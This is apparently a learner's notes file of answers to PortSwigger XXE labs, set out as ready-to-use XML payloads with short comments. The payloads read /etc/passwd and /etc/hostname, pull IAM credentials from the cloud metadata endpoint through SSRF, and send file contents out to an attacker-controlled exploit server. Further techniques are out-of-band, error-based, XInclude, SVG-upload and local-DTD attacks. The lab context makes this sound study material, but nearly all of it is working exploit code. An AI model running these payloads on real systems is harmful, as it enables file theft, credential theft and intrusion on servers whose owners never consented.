

<!-- port swigger -->


<!-- Answer for question 1 retreving users info from internal system  -->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<stockCheck><productId>
    &xxe;
</productId>
<storeId>1
</storeId>
</stockCheck>


<!-- Answer for question 2 retreving admin data from local domain in the webserver using SSRF attack  -->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck>
<productId>
    &xxe;
</productId>
<storeId>1</storeId>
</stockCheck>




<!-- Answer for question 3 out of bound XXE sending requests to our webserver-->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "https://burpcollaborator.net/">]>
<stockCheck><productId>
    &xxe;
</productId>
<storeId>1
</storeId>
</stockCheck>


<!-- Answer for question 4 out of bound XXE sending requests to our webserver -->
<!-- In this lab creating Entitys are not allowed so insteand we need to create a XML paramter with that will hold as a value our Entity action -->
<!-- XML paramter declartion symbol is this %XMLparam-->


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "https://burpcollaborator.net/"> %xxe;]>
<stockCheck>
<productId>
    %xxe;
</productId>
<storeId>
    1
</storeId>
</stockCheck>



<!-- Answer for question 5  -->
<!-- In this lab the results are not shown in the server side, So to be able to see the results from our XXE attack we need to send the data to our own server FROM the attacked website -->


<!-- Hacker server side, Calling the paramters to recive the data and store it in our website server -->

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://exploit-0a0f00d4037208498b2901e8010c00ca.exploit-server.net/exploit/?x=%file;'>">
%eval;
%exfiltrate;

<!-- Attacked website, Same thing just one line. -->

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a0f00d4037208498b2901e8010c00ca.exploit-server.net/exploit"> %xxe;]>
<stockCheck>
    <productId>
        2
</productId>
<storeId>
    1
</storeId>
</stockCheck>







<!-- Answer for question 6  -->
<!-- In this lab this the results are not shown in the server BUT when there is an error it will show the results (we can't send data to our website) -->
<!-- So in order to trigger an error that will show the contents of /etc/passwd. We need to create on our website a xml code and call it in the Attacked website to trigger and error that will show the data -->


<!-- Hacker server side, Calling the paramters to recive the data and store it in our website server -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;


<!-- Attacked website, Same thing just one line. -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a4100c10469a8df82ff3c79017b00b7.exploit-server.net/exploit"> 
%xxe;
%eval;
%error;]>
<stockCheck>
    <productId>
        1

    </productId>
    <storeId>
        1
    </storeId>
</stockCheck>









<!-- Answer for question 7  -->
<!-- In this lab we can't preform a classic xml attack because the server sends the values to xml document in the backend -->
<!-- So using the Xinclude which let us make create a sub xml document to define our entitys -->

<!-- xmlns - allows to imports xmls codes of documnet to use in other xml codes, xi is an function in XInclude to make the attack work  -->

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1




<!-- Answer for question 8  -->
<!-- In this lab the server accpets images and svg image (SVG allow to put xml code in it), So to get the hostname we construct xml code that displays the hostname on the photo when viewed-->
<!-- Because the server uses SVG reader we need to import it and import xlink to display the contents of the hostname onto the photo -->
 
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>



<!-- Answer for question 9 -->
<!-- In this lab the server uses xml code to retreve data from internal xml code and have has a already declared entity in that xml code -->
<!-- Note the server dosen't display the results in the client side, So all we need to do is to call this internal xml code and create an error that will display the contents of /etc/passwd -->
 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % local_xml_file SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamso '
<!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_xml_file;
]>
<stockCheck>

<productId>
    6
</productId>
<storeId>
    1
</storeId>
</stockCheck>